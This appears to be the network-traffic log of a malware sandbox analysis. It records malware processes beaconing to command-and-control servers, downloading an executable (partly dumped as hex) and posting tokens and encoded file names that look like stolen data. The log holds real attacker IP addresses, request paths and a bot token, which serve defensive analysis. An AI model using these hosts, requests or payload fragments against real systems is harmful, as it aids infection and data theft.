                                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.267998934 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.764940977 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:31 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:33.996862888 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:34.513262987 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:34 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:36.857660055 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:37.349622011 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:37 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=94
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:40.065291882 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:40.554954052 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:40 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:42.939107895 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:43.498959064 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:43 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.582876921 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:46.073127031 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:45 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            23192.168.2.449872185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:28.833319902 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019673001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:30.181344986 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:29 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            24192.168.2.44987431.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:30.437182903 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.755851984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:31 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 4438776
                                                                                                                                                                                                                                                            Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "675784f0-43baf8"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.755914927 CET224INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                                                                            Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.756062984 CET1236INData Raw: c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff 76 28 ff 15 80 a1 41 00 5f 33 c0 5e
                                                                                                                                                                                                                                                            Data Ascii: D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XAA^L$
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.756283045 CET224INData Raw: 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55 8b ec ff 75 0c 8b 4d 08 e8 03 fc ff
                                                                                                                                                                                                                                                            Data Ascii: vYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.756294012 CET1236INData Raw: 56 8b f1 8d 4e 08 c7 06 58 a5 41 00 e8 fa 0a 01 00 f6 44 24 08 01 74 07 56 e8 f1 79 01 00 59 8b c6 5e c2 04 00 55 8b ec 51 56 57 ff 75 08 8b f1 8d 4e 0c e8 26 1e 01 00 ff 75 0c 8d 7e 10 8b cf e8 63 fb ff ff 6a 5c 8b cf e8 ec fe ff ff 33 ff 8d 45
                                                                                                                                                                                                                                                            Data Ascii: VNXAD$tVyY^UQVWuN&u~cj\3EPWVh<@WW5dA=lAA=AhAtsj5hAAlA;=XAt2t!ttg~k~}PjKjjjW|YYd9=`Au\EP5hAAMt;u
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.756690025 CET1236INData Raw: 48 08 89 78 10 89 78 14 e8 2c 07 01 00 84 c0 0f 85 b0 00 00 00 ff 15 98 a1 41 00 53 8d 4d e4 89 45 08 e8 7b f6 ff ff 8d 45 e4 50 e8 5e 16 00 00 3b c7 59 7d 3b ff 75 08 8b 06 6a 6a 56 ff 50 20 ff 75 e4 8b f0 e8 f1 74 01 00 8b 45 0c 3b c7 59 74 06
                                                                                                                                                                                                                                                            Data Ascii: Hxx,ASME{EP^;Y};ujjVP utE;YtPQMutYMf<AuE6YujhVPF jSHxxuAPjjVS uwtYuMVEM0g#E8>AP
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.756701946 CET448INData Raw: 6a 18 ff 75 08 ff 15 40 a0 41 00 57 53 ff 75 d8 ff d6 57 53 ff 75 dc 89 45 f4 ff d6 ff 75 fc 8b 35 18 a0 41 00 89 45 f8 ff d6 ff 75 fc 8b d8 ff d6 ff 75 08 8b 35 38 a0 41 00 53 8b f8 ff d6 ff 75 f8 89 45 f0 ff 75 f4 ff 75 fc ff 15 34 a0 41 00 50
                                                                                                                                                                                                                                                            Data Ascii: ju@AWSuWSuEu5AEuu58ASuEuu4APWjWE<Ah u3uPPSuuPPW,AjW(AuESuW5$ASWujAEuWAWWWWuTA_^[UhSVWj@EPuA-h
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.756932020 CET1236INData Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33
                                                                                                                                                                                                                                                            Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.756946087 CET1236INData Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c
                                                                                                                                                                                                                                                            Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B|2_^[Ar91|S\$VWu33|$Gt$P$AtF;w|3_^[t3GVt$W39~~(Ft$P$AujWPOG;~
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.756957054 CET1236INData Raw: 37 00 89 75 f4 e8 ec fd ff ff 57 e8 ef 64 01 00 59 5f 8b 45 08 5e 5b c9 c2 0c 00 53 56 8b 74 24 0c 57 8b f9 8b 47 04 39 06 7e 02 89 06 8b 5c 24 14 53 e8 d0 e6 ff ff 8b 06 50 03 c3 50 8b cf e8 ec fa ff ff 5f 5e 5b c2 08 00 8b 44 24 08 ff 30 8b 44
                                                                                                                                                                                                                                                            Data Ascii: 7uWdY_E^[SVt$WG9~\$SPP_^[D$0D$0YY@W|$D$xt.SVpFPVPVSjt$,8Af$A^G[_USVuE39Xt2WxS?ESAPQNPWuSuA
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:31.875718117 CET1236INData Raw: 4d f4 e8 72 f8 ff ff f6 85 a4 fd ff ff 10 8b 7d f4 74 35 68 88 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 33 68 80 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 1d 57 e8 58 ff ff ff 59 eb 10 6a 00 57 ff d6 85 c0 74 4b 57
                                                                                                                                                                                                                                                            Data Ascii: Mr}t5hAP$At3hAP$AtWXYjWtKWAt@PSAqSAjutuAtW_3@W_3Y_^[=lAt3@Vt$VAu3@^ujVAtVA^3^VY^


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            25192.168.2.449893185.215.113.206806672C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:39.739826918 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJE
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 1451
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:39.739850998 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37
                                                                                                                                                                                                                                                            Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:41.565258026 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:40 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:41.845993996 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="file"------EGIIIECBGDHJJKFIDAKJ--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:42.790318966 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:42 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:44.886562109 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file"------KEGDAKEHJDHIDHJJDAEC--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:45.830771923 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:45 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.120054960 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.565504074 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:47 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
